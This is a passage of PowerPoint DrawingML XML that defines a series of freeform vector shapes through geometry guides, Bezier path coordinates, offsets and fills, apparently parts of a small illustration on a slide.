                <a:ext cx="361" cy="399"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 153"/>
                  <a:gd name="T1" fmla="*/ 168 h 169"/>
                  <a:gd name="T2" fmla="*/ 1 w 153"/>
                  <a:gd name="T3" fmla="*/ 162 h 169"/>
                  <a:gd name="T4" fmla="*/ 1 w 153"/>
                  <a:gd name="T5" fmla="*/ 162 h 169"/>
                  <a:gd name="T6" fmla="*/ 145 w 153"/>
                  <a:gd name="T7" fmla="*/ 2 h 169"/>
                  <a:gd name="T8" fmla="*/ 151 w 153"/>
                  <a:gd name="T9" fmla="*/ 2 h 169"/>
                  <a:gd name="T10" fmla="*/ 151 w 153"/>
                  <a:gd name="T11" fmla="*/ 2 h 169"/>
                  <a:gd name="T12" fmla="*/ 151 w 153"/>
                  <a:gd name="T13" fmla="*/ 8 h 169"/>
                  <a:gd name="T14" fmla="*/ 151 w 153"/>
                  <a:gd name="T15" fmla="*/ 8 h 169"/>
                  <a:gd name="T16" fmla="*/ 7 w 153"/>
                  <a:gd name="T17" fmla="*/ 167 h 169"/>
                  <a:gd name="T18" fmla="*/ 4 w 153"/>
                  <a:gd name="T19" fmla="*/ 169 h 169"/>
                  <a:gd name="T20" fmla="*/ 4 w 153"/>
                  <a:gd name="T21" fmla="*/ 169 h 169"/>
                  <a:gd name="T22" fmla="*/ 1 w 153"/>
                  <a:gd name="T23" fmla="*/ 168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3" h="169">
                    <a:moveTo>
                      <a:pt x="1" y="168"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="166"/>
                      <a:pt x="0" y="164"/>
                      <a:pt x="1" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="1" y="162"/>
                      <a:pt x="1" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="2"/>
                      <a:pt x="145" y="2"/>
                      <a:pt x="145" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="1"/>
                      <a:pt x="149" y="0"/>
                      <a:pt x="151" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="2"/>
                      <a:pt x="151" y="2"/>
                      <a:pt x="151" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="3"/>
                      <a:pt x="153" y="6"/>
                      <a:pt x="151" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="8"/>
                      <a:pt x="151" y="8"/>
                      <a:pt x="151" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="167"/>
                      <a:pt x="7" y="167"/>
                      <a:pt x="7" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="168"/>
                      <a:pt x="5" y="169"/>
                      <a:pt x="4" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="169"/>
                      <a:pt x="4" y="169"/>
                      <a:pt x="4" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="169"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="1" y="1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97" name="Freeform 787"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-7292" y="2949"/>
                <a:ext cx="508" cy="553"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 215 w 215"/>
                  <a:gd name="T1" fmla="*/ 205 h 234"/>
                  <a:gd name="T2" fmla="*/ 191 w 215"/>
                  <a:gd name="T3" fmla="*/ 198 h 234"/>
                  <a:gd name="T4" fmla="*/ 117 w 215"/>
                  <a:gd name="T5" fmla="*/ 183 h 234"/>
                  <a:gd name="T6" fmla="*/ 117 w 215"/>
                  <a:gd name="T7" fmla="*/ 182 h 234"/>
                  <a:gd name="T8" fmla="*/ 117 w 215"/>
                  <a:gd name="T9" fmla="*/ 10 h 234"/>
                  <a:gd name="T10" fmla="*/ 107 w 215"/>
                  <a:gd name="T11" fmla="*/ 0 h 234"/>
                  <a:gd name="T12" fmla="*/ 97 w 215"/>
                  <a:gd name="T13" fmla="*/ 10 h 234"/>
                  <a:gd name="T14" fmla="*/ 97 w 215"/>
                  <a:gd name="T15" fmla="*/ 182 h 234"/>
                  <a:gd name="T16" fmla="*/ 97 w 215"/>
                  <a:gd name="T17" fmla="*/ 183 h 234"/>
                  <a:gd name="T18" fmla="*/ 24 w 215"/>
                  <a:gd name="T19" fmla="*/ 198 h 234"/>
                  <a:gd name="T20" fmla="*/ 0 w 215"/>
                  <a:gd name="T21" fmla="*/ 205 h 234"/>
                  <a:gd name="T22" fmla="*/ 20 w 215"/>
                  <a:gd name="T23" fmla="*/ 210 h 234"/>
                  <a:gd name="T24" fmla="*/ 83 w 215"/>
                  <a:gd name="T25" fmla="*/ 200 h 234"/>
                  <a:gd name="T26" fmla="*/ 97 w 215"/>
                  <a:gd name="T27" fmla="*/ 231 h 234"/>
                  <a:gd name="T28" fmla="*/ 107 w 215"/>
                  <a:gd name="T29" fmla="*/ 234 h 234"/>
                  <a:gd name="T30" fmla="*/ 119 w 215"/>
                  <a:gd name="T31" fmla="*/ 230 h 234"/>
                  <a:gd name="T32" fmla="*/ 132 w 215"/>
                  <a:gd name="T33" fmla="*/ 200 h 234"/>
                  <a:gd name="T34" fmla="*/ 195 w 215"/>
                  <a:gd name="T35" fmla="*/ 210 h 234"/>
                  <a:gd name="T36" fmla="*/ 215 w 215"/>
                  <a:gd name="T37" fmla="*/ 205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5" h="234">
                    <a:moveTo>
                      <a:pt x="215" y="205"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="191" y="198"/>
                      <a:pt x="191" y="198"/>
                      <a:pt x="191" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="183"/>
                      <a:pt x="117" y="183"/>
                      <a:pt x="117" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="183"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="117" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="10"/>
                      <a:pt x="117" y="10"/>
                      <a:pt x="117" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="4"/>
                      <a:pt x="113" y="0"/>
                      <a:pt x="107" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="0"/>
                      <a:pt x="97" y="4"/>
                      <a:pt x="97" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="182"/>
                      <a:pt x="97" y="182"/>
                      <a:pt x="97" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="182"/>
                      <a:pt x="97" y="183"/>
                      <a:pt x="97" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="198"/>
                      <a:pt x="24" y="198"/>
                      <a:pt x="24" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="205"/>
                      <a:pt x="0" y="205"/>
                      <a:pt x="0" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="210"/>
                      <a:pt x="20" y="210"/>
                      <a:pt x="20" y="210"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="200"/>
                      <a:pt x="83" y="200"/>
                      <a:pt x="83" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="231"/>
                      <a:pt x="97" y="231"/>
                      <a:pt x="97" y="231"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="234"/>
                      <a:pt x="107" y="234"/>
                      <a:pt x="107" y="234"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="230"/>
                      <a:pt x="119" y="230"/>
                      <a:pt x="119" y="230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="132" y="200"/>
                      <a:pt x="132" y="200"/>
                      <a:pt x="132" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="195" y="210"/>
                      <a:pt x="195" y="210"/>
                      <a:pt x="195" y="210"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="215" y="20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98" name="Freeform 788"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6940" y="1988"/>
                <a:ext cx="494" cy="361"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 209 w 209"/>
                  <a:gd name="T1" fmla="*/ 60 h 153"/>
                  <a:gd name="T2" fmla="*/ 32 w 209"/>
                  <a:gd name="T3" fmla="*/ 153 h 153"/>
                  <a:gd name="T4" fmla="*/ 209 w 209"/>
                  <a:gd name="T5" fmla="*/ 6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9" h="153">
                    <a:moveTo>
                      <a:pt x="209" y="60"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="0"/>
                      <a:pt x="0" y="65"/>
                      <a:pt x="32" y="153"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="209" y="6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99" name="Freeform 789"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6881" y="2097"/>
                <a:ext cx="459" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 73 w 194"/>
                  <a:gd name="T1" fmla="*/ 50 h 118"/>
                  <a:gd name="T2" fmla="*/ 191 w 194"/>
                  <a:gd name="T3" fmla="*/ 25 h 118"/>
                  <a:gd name="T4" fmla="*/ 194 w 194"/>
                  <a:gd name="T5" fmla="*/ 29 h 118"/>
                  <a:gd name="T6" fmla="*/ 184 w 194"/>
                  <a:gd name="T7" fmla="*/ 14 h 118"/>
                  <a:gd name="T8" fmla="*/ 68 w 194"/>
                  <a:gd name="T9" fmla="*/ 39 h 118"/>
                  <a:gd name="T10" fmla="*/ 8 w 194"/>
                  <a:gd name="T11" fmla="*/ 109 h 118"/>
                  <a:gd name="T12" fmla="*/ 12 w 194"/>
                  <a:gd name="T13" fmla="*/ 118 h 118"/>
                  <a:gd name="T14" fmla="*/ 73 w 194"/>
                  <a:gd name="T15" fmla="*/ 5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4" h="118">
                    <a:moveTo>
                      <a:pt x="73" y="50"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="22"/>
                      <a:pt x="174" y="11"/>
                      <a:pt x="191" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="194" y="29"/>
                      <a:pt x="194" y="29"/>
                      <a:pt x="194" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="194" y="29"/>
                      <a:pt x="185" y="15"/>
                      <a:pt x="184" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="0"/>
                      <a:pt x="115" y="11"/>
                      <a:pt x="68" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="63"/>
                      <a:pt x="0" y="93"/>
                      <a:pt x="8" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="109"/>
                      <a:pt x="10" y="114"/>
                      <a:pt x="12" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="101"/>
                      <a:pt x="32" y="73"/>
                      <a:pt x="73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00" name="Freeform 790"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6862" y="2123"/>
                <a:ext cx="458" cy="304"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 194"/>
                  <a:gd name="T1" fmla="*/ 19 h 129"/>
                  <a:gd name="T2" fmla="*/ 187 w 194"/>
                  <a:gd name="T3" fmla="*/ 19 h 129"/>
                  <a:gd name="T4" fmla="*/ 186 w 194"/>
                  <a:gd name="T5" fmla="*/ 18 h 129"/>
                  <a:gd name="T6" fmla="*/ 183 w 194"/>
                  <a:gd name="T7" fmla="*/ 14 h 129"/>
                  <a:gd name="T8" fmla="*/ 65 w 194"/>
                  <a:gd name="T9" fmla="*/ 39 h 129"/>
                  <a:gd name="T10" fmla="*/ 4 w 194"/>
                  <a:gd name="T11" fmla="*/ 107 h 129"/>
                  <a:gd name="T12" fmla="*/ 4 w 194"/>
                  <a:gd name="T13" fmla="*/ 107 h 129"/>
                  <a:gd name="T14" fmla="*/ 4 w 194"/>
                  <a:gd name="T15" fmla="*/ 109 h 129"/>
                  <a:gd name="T16" fmla="*/ 7 w 194"/>
                  <a:gd name="T17" fmla="*/ 113 h 129"/>
                  <a:gd name="T18" fmla="*/ 8 w 194"/>
                  <a:gd name="T19" fmla="*/ 114 h 129"/>
                  <a:gd name="T20" fmla="*/ 126 w 194"/>
                  <a:gd name="T21" fmla="*/ 90 h 129"/>
                  <a:gd name="T22" fmla="*/ 187 w 194"/>
                  <a:gd name="T23" fmla="*/ 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4" h="129">
                    <a:moveTo>
                      <a:pt x="187" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="187" y="19"/>
                      <a:pt x="187" y="19"/>
                      <a:pt x="187" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="187" y="19"/>
                      <a:pt x="186" y="18"/>
                      <a:pt x="186" y="18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66" y="0"/>
                      <a:pt x="113" y="11"/>
                      <a:pt x="65" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="62"/>
                      <a:pt x="0" y="90"/>
                      <a:pt x="4" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="107"/>
                      <a:pt x="4" y="107"/>
                      <a:pt x="4" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="107"/>
                      <a:pt x="4" y="108"/>
                      <a:pt x="4" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="113"/>
                      <a:pt x="7" y="113"/>
                      <a:pt x="7" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="113"/>
                      <a:pt x="8" y="114"/>
                      <a:pt x="8" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="129"/>
                      <a:pt x="78" y="118"/>
                      <a:pt x="126" y="90"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="169" y="65"/>
                      <a:pt x="194" y="36"/>
                      <a:pt x="187" y="19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01" name="Freeform 791"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6739" y="2205"/>
                <a:ext cx="132" cy="81"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 56"/>
                  <a:gd name="T1" fmla="*/ 17 h 34"/>
                  <a:gd name="T2" fmla="*/ 1 w 56"/>
                  <a:gd name="T3" fmla="*/ 25 h 34"/>
                  <a:gd name="T4" fmla="*/ 2 w 56"/>
                  <a:gd name="T5" fmla="*/ 30 h 34"/>
                  <a:gd name="T6" fmla="*/ 35 w 56"/>
                  <a:gd name="T7" fmla="*/ 23 h 34"/>
                  <a:gd name="T8" fmla="*/ 51 w 56"/>
                  <a:gd name="T9" fmla="*/ 1 h 34"/>
                  <a:gd name="T10" fmla="*/ 46 w 56"/>
                  <a:gd name="T11" fmla="*/ 0 h 34"/>
                  <a:gd name="T12" fmla="*/ 30 w 56"/>
                  <a:gd name="T13" fmla="*/ 1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34">
                    <a:moveTo>
                      <a:pt x="30" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="23"/>
                      <a:pt x="7" y="27"/>
                      <a:pt x="1" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="27"/>
                      <a:pt x="1" y="29"/>
                      <a:pt x="2" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="34"/>
                      <a:pt x="22" y="31"/>
                      <a:pt x="35" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="15"/>
                      <a:pt x="56" y="5"/>
                      <a:pt x="51" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="1"/>
                      <a:pt x="48" y="0"/>
                      <a:pt x="46" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="4"/>
                      <a:pt x="40" y="11"/>
                      <a:pt x="3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02" name="Freeform 792"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6737" y="2203"/>
                <a:ext cx="107" cy="66"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 45"/>
                  <a:gd name="T1" fmla="*/ 9 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 45"/>
                  <a:gd name="T3" fmla="*/ 26 h 28"/>
                  <a:gd name="T4" fmla="*/ 29 w 45"/>
                  <a:gd name="T5" fmla="*/ 18 h 28"/>
                  <a:gd name="T6" fmla="*/ 45 w 45"/>
                  <a:gd name="T7" fmla="*/ 1 h 28"/>
                  <a:gd name="T8" fmla="*/ 17 w 45"/>
                  <a:gd name="T9" fmla="*/ 9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8">
                    <a:moveTo>
                      <a:pt x="17" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="15"/>
                      <a:pt x="1" y="22"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="28"/>
                      <a:pt x="18" y="24"/>
                      <a:pt x="29" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="12"/>
                      <a:pt x="45" y="5"/>
                      <a:pt x="45" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="0"/>
                      <a:pt x="28" y="3"/>
                      <a:pt x="17" y="9"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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03" name="Freeform 793"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6576" y="2179"/>
                <a:ext cx="130" cy="81"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 50 w 55"/>
                  <a:gd name="T1" fmla="*/ 2 h 34"/>
                  <a:gd name="T2" fmla="*/ 44 w 55"/>
                  <a:gd name="T3" fmla="*/ 0 h 34"/>
                  <a:gd name="T4" fmla="*/ 27 w 55"/>
                  <a:gd name="T5" fmla="*/ 18 h 34"/>
                  <a:gd name="T6" fmla="*/ 0 w 55"/>
                  <a:gd name="T7" fmla="*/ 26 h 34"/>
                  <a:gd name="T8" fmla="*/ 1 w 55"/>
                  <a:gd name="T9" fmla="*/ 30 h 34"/>
                  <a:gd name="T10" fmla="*/ 34 w 55"/>
                  <a:gd name="T11" fmla="*/ 23 h 34"/>
                  <a:gd name="T12" fmla="*/ 50 w 55"/>
                  <a:gd name="T13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34">
                    <a:moveTo>
                      <a:pt x="50" y="2"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="1"/>
                      <a:pt x="46" y="0"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="5"/>
                      <a:pt x="37" y="12"/>
                      <a:pt x="27" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="24"/>
                      <a:pt x="6" y="27"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="28"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="1" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="34"/>
                      <a:pt x="21" y="31"/>
                      <a:pt x="34" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="15"/>
                      <a:pt x="55" y="6"/>
                      <a:pt x="5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04" name="Freeform 794"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6576" y="2179"/>
                <a:ext cx="104" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 44 w 44"/>
                  <a:gd name="T1" fmla="*/ 0 h 27"/>
                  <a:gd name="T2" fmla="*/ 17 w 44"/>
                  <a:gd name="T3" fmla="*/ 9 h 27"/>
                  <a:gd name="T4" fmla="*/ 0 w 44"/>
                  <a:gd name="T5" fmla="*/ 26 h 27"/>
                  <a:gd name="T6" fmla="*/ 27 w 44"/>
                  <a:gd name="T7" fmla="*/ 18 h 27"/>
                  <a:gd name="T8" fmla="*/ 44 w 44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7">
                    <a:moveTo>
                      <a:pt x="44" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="0"/>
                      <a:pt x="27" y="3"/>
                      <a:pt x="17" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="15"/>
                      <a:pt x="0" y="22"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="27"/>
                      <a:pt x="17" y="24"/>
                      <a:pt x="27" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="12"/>
                      <a:pt x="44" y="5"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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05" name="Freeform 795"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6675" y="2278"/>
                <a:ext cx="132" cy="81"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 45 w 56"/>
                  <a:gd name="T1" fmla="*/ 0 h 34"/>
                  <a:gd name="T2" fmla="*/ 29 w 56"/>
                  <a:gd name="T3" fmla="*/ 16 h 34"/>
                  <a:gd name="T4" fmla="*/ 1 w 56"/>
                  <a:gd name="T5" fmla="*/ 25 h 34"/>
                  <a:gd name="T6" fmla="*/ 2 w 56"/>
                  <a:gd name="T7" fmla="*/ 30 h 34"/>
                  <a:gd name="T8" fmla="*/ 35 w 56"/>
                  <a:gd name="T9" fmla="*/ 23 h 34"/>
                  <a:gd name="T10" fmla="*/ 51 w 56"/>
                  <a:gd name="T11" fmla="*/ 2 h 34"/>
                  <a:gd name="T12" fmla="*/ 45 w 56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34">
                    <a:moveTo>
                      <a:pt x="45" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="5"/>
                      <a:pt x="38" y="11"/>
                      <a:pt x="29" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="22"/>
                      <a:pt x="7" y="26"/>
                      <a:pt x="1" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="27"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="2" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="34"/>
                      <a:pt x="21" y="31"/>
                      <a:pt x="35" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="15"/>
                      <a:pt x="56" y="6"/>
                      <a:pt x="51" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="1"/>
                      <a:pt x="48" y="0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06" name="Freeform 796"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6673" y="2278"/>
                <a:ext cx="104" cy="62"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 44"/>
                  <a:gd name="T1" fmla="*/ 16 h 26"/>
                  <a:gd name="T2" fmla="*/ 44 w 44"/>
                  <a:gd name="T3" fmla="*/ 0 h 26"/>
                  <a:gd name="T4" fmla="*/ 17 w 44"/>
                  <a:gd name="T5" fmla="*/ 9 h 26"/>
                  <a:gd name="T6" fmla="*/ 0 w 44"/>
                  <a:gd name="T7" fmla="*/ 25 h 26"/>
                  <a:gd name="T8" fmla="*/ 28 w 44"/>
                  <a:gd name="T9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6">
                    <a:moveTo>
                      <a:pt x="28" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="11"/>
                      <a:pt x="43" y="5"/>
                      <a:pt x="44" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="0"/>
                      <a:pt x="27" y="3"/>
                      <a:pt x="17" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="14"/>
                      <a:pt x="1" y="20"/>
                      <a:pt x="0" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="26"/>
                      <a:pt x="17" y="22"/>
                      <a:pt x="28" y="16"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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07" name="Freeform 797"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6824" y="2307"/>
                <a:ext cx="130" cy="80"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 47 w 55"/>
                  <a:gd name="T1" fmla="*/ 0 h 34"/>
                  <a:gd name="T2" fmla="*/ 30 w 55"/>
                  <a:gd name="T3" fmla="*/ 16 h 34"/>
                  <a:gd name="T4" fmla="*/ 1 w 55"/>
                  <a:gd name="T5" fmla="*/ 24 h 34"/>
                  <a:gd name="T6" fmla="*/ 2 w 55"/>
                  <a:gd name="T7" fmla="*/ 30 h 34"/>
                  <a:gd name="T8" fmla="*/ 35 w 55"/>
                  <a:gd name="T9" fmla="*/ 23 h 34"/>
                  <a:gd name="T10" fmla="*/ 51 w 55"/>
                  <a:gd name="T11" fmla="*/ 2 h 34"/>
                  <a:gd name="T12" fmla="*/ 47 w 55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34">
                    <a:moveTo>
                      <a:pt x="47" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="5"/>
                      <a:pt x="39" y="11"/>
                      <a:pt x="30" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="23"/>
                      <a:pt x="7" y="26"/>
                      <a:pt x="1" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="27"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="2" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="34"/>
                      <a:pt x="21" y="31"/>
                      <a:pt x="35" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="15"/>
                      <a:pt x="55" y="6"/>
                      <a:pt x="51" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="1"/>
                      <a:pt x="48" y="1"/>
                      <a:pt x="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08" name="Freeform 798"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-6822" y="2304"/>
                <a:ext cx="109" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 46"/>
